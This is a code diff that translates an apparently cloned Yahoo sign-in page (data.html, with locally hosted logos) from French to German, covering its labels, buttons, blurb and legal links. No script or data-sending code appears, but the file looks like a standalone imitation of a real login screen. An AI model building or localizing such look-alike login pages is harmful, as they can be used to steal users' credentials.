--- a/data.html
+++ b/data.html
@@ -93,7 +93,7 @@
     <div id="login-body" class="loginish dark-background puree-v2 responsive  grid    ">
         <div class="mbr-desktop-hd">
             <span class="column">
-                <a href="https://fr.yahoo.com/">
+                <a href="https://de.yahoo.com/">
                     <img src="assets/img/yahoo.png" alt="Yahoo"
                         class="logo " width="" height="36">
                     <img src="assets/img/yahoo-dark.png" alt="Yahoo"
@@ -101,7 +101,7 @@
                 </a>
             </span>
             <span class="column help txt-align-right">
-                <a href="https://help.yahoo.com/kb/index?locale=fr_FR&amp;page=product&amp;y=PROD_ACCT">Aide</a>
+                <a href="https://help.yahoo.com/kb/index?locale=fr_FR&amp;page=product&amp;y=PROD_ACCT">Hilfe</a>
             </span>
         </div>
         <div class="login-box-container">
@@ -116,8 +116,8 @@
                     <div class="challenge-header">
                     </div>
                     <div class="username-challenge" id="login-landing">
-                        <strong class="challenge-heading">Se&nbsp;connecter</strong>
-                        <span class="challenge-desc signin-sub-title">à l’aide de votre compte&nbsp;Yahoo</span>
+                        <strong class="challenge-heading">Bei Yahoo Mail&nbsp;anmelden</strong>
+                        <span class="challenge-desc signin-sub-title">mit Ihrem Yahoo&nbsp;Account</span>
 
                         <form id="login-username-form" class="pure-form">
                             <input type="hidden" name="browser-fp-data" id="browser-fp-data"
@@ -613,8 +613,7 @@
                                         autocomplete="username" autocapitalize="none" autocorrect="off" autofocus="true"
                                         placeholder=" ">
                                     <div class="input-field-icon hide" id="username-field-icon"></div>
-                                    <label for="login-username" id="login-label" class="login-label">Nom d'utilisateur,
-                                        mail ou téléphone</label>
+                                    <label for="login-username" id="login-label" class="login-label">Benutzername, E-Mail oder Handynr.</label>
                                     <ul class="auto-fill-overlay hide" aria-live="polite" id="domain-auto-fill">
                                         <li data-fill="yahoo.com" tabindex="2">yahoo.com</li>
                                         <li data-fill="gmail.com" tabindex="3">gmail.com</li>
@@ -628,7 +627,7 @@
 
                             <div class="button-container">
                                 <input id="login-signin" type="submit" name="signin"
-                                    class="pure-button puree-button-primary challenge-button" value="Suivant"
+                                    class="pure-button puree-button-primary challenge-button" value="Weiter"
                                     data-rapid-tracking="true" data-ylk="elm:btn;elmt:primary;slk:next;mKey:next">
                             </div>
 
@@ -636,14 +635,14 @@
                                 <div class="helper-item ">
                                     <span class="stay-signed-in checkbox-container">
                                         <input id="persistent" name="persistent" value="y" type="checkbox" checked="">
-                                        <label for="persistent">Restez connecté</label>
+                                        <label for="persistent">Angemeldet bleiben</label>
                                     </span>
                                 </div>
                                 <div class="helper-item arlink">
                                     <span class="help">
                                         <a href="/forgot?lang=fr&amp;done=https%3A%2F%2Fwww.yahoo.com"
                                             id="mbr-forgot-link" data-ylk="elm:btn;elmt:forgot;slk:forgot;mkey:forgot"
-                                            data-rapid-tracking="true">Nom d'utilisateur oublié&nbsp;?</a>
+                                            data-rapid-tracking="true">Benutzernamen&nbsp;vergessen?</a>
                                     </span>
                                 </div>
                             </div>
@@ -655,13 +654,12 @@
                                         id="createacc" role="button"
                                         class="pure-button puree-button-secondary challenge-button"
                                         data-rapid-tracking="true"
-                                        data-ylk="elm:link;elmt:secondary;slk:signup;mKey:signup">Créer
-                                        un&nbsp;compte</a>
+                                        data-ylk="elm:link;elmt:secondary;slk:signup;mKey:signup">Account&nbsp;erstellen</a>
                                 </p>
 
                                 <div id="social-login-container" class="social-login-container">
                                     <div class="or-cont-with-desc challenge-feedback-text">
-                                        Ou continuez&nbsp;avec
+                                        Oder machen Sie damit weiter
                                     </div>
                                     <ul class="social-login">
                                         <li class="items-cont-1">
@@ -681,9 +679,8 @@
                 </div>
             </div>
             <div id="login-box-ad-fallback" class="login-box-ad-fallback">
-                <h1>Grâce à Yahoo, tous les sujets qui vous intéressent sont à portée de&nbsp;main.</h1>
-                <p>Yahoo&nbsp;Mail, actualités locales, nationales et internationales, finances, sports, musique,
-                    cinéma... Vivez la vie à fond en profitant pleinement du&nbsp;Web.</p>
+                <h1>Mit Yahoo ist es ganz einfach, die wichtigen Dinge zu genießen.</h1>
+                <p>Das erstklassige Yahoo Mail, für die neuesten lokalen, nationalen und internationalen Nachrichten, Finanzen, Sport, Musik, Kino und mehr. Mehr vom Internet, mehr vom&nbsp;Leben.</p>
             </div>
         </div>
         <div class="login-bg-outer">
@@ -694,12 +691,11 @@
         </div>
         <div class="login-footer">
             <p>
-                <a href="https://legal.yahoo.com/ie/fr/yahoo/terms/otos/index.html" target="_blank"
-                    class="terms">CGU</a>
+                <a href="https://legal.yahoo.com/ie/de/yahoo/terms/otos/index.html" target="_blank"
+                    class="terms">AGB</a>
 
                 <span>|</span>
-                <a href="https://legal.yahoo.com/ie/fr/yahoo/privacy/index.html" target="_blank" class="privacy">Vie
-                    privée</a>
+                <a href="https://legal.yahoo.com/ie/de/yahoo/privacy/index.html" target="_blank" class="privacy">Datenschutz</a>
 
             </p>
         </div>
